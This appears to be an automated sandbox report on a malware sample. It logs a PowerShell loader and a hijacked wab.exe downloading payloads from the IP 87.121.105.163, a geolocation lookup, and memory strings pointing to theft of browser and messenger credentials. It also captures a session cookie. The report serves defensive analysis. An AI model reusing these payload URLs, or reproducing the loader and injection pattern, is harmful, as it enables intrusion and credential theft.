Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.1.237.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: global traffic |
HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMiZy7EGIjBhRj7IuadU0gbq76nmijOz5rJlabhPhKgsZ7QxpWJU2pGaolQtvo8xHffhXVqTQ4YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o |
Source: global traffic |
HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /Subumbilical.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache |
Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy) |
Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy) |
Source: wab.exe |
String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook) |
Source: wab.exe, 00000010.00000003.2642937778.00000000029EA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: nts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook) |
Source: wab.exe, 00000010.00000003.2642937778.00000000029EA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: nts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo) |
Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook) |
Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo) |
Source: powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163 |
Source: wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin |
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u |
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCu |
Source: wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE |
Source: wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi |
Source: powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Subumbilical.dwpXR |
Source: powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.108 |
Source: bhv5CE7.tmp.16.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0 |
Source: bhv5CE7.tmp.16.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B |
Source: svchost.exe, 00000003.00000002.3226864730.0000021BB3E00000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: bhv5CE7.tmp.16.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: bhv5CE7.tmp.16.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 |
Source: bhv5CE7.tmp.16.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3223807080.0000004D6CC7B000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2743509012.0000021BB3CE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/ |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567 |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg |
Source: qmgr.db.3.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe |
Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb |
Source: svchost.exe, 00000003.00000002.3227207606.0000021BB3E8C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID: |
Source: edb.log.3.dr |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/ |
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/i |
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp |
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp0 |
Source: wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpI |
Source: wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp_ |
Source: wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpg |
Source: wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gprqDS |
Source: powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: bhv5CE7.tmp.16.dr |
String found in binary or memory: http://ocsp.digicert.com0 |
Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com |
Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.com |
Source: wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comata |
Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com |
Source: wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comr |
Source: wab.exe, 00000010.00000002.2643556229.0000000000682000.00000004.00000010.00020000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net |
Source: wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net/ |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: edb.log.3.dr |
String found in binary or memory: https://g.live.com/odclientsettings/Prod/C: |
Source: svchost.exe, 00000003.00000003.2000735992.0000021BB3CE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C: |
Source: powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: |
Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 |
Source: wab.exe, 00000010.00000002.2660982925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2643041516.00000000029E9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live |
Source: wab.exe |
String found in binary or memory: https://login.yahoo.com/config/login |
Source: powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: qmgr.db.3.dr |
String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C: |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: wab.exe |
String found in binary or memory: https://www.google.com/accounts/servicelogin |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: unknown |
Network traffic detected: HTTP traffic on port 49674 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49720 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49720 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49675 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49703 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49703 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
16_2_0040987A |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
16_2_004098E2 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
19_2_00406DFC |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
19_2_00406E9F |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
22_2_004068B5 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
22_2_004072B5 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_02D9CC60 |
1_2_02D9CC60 |
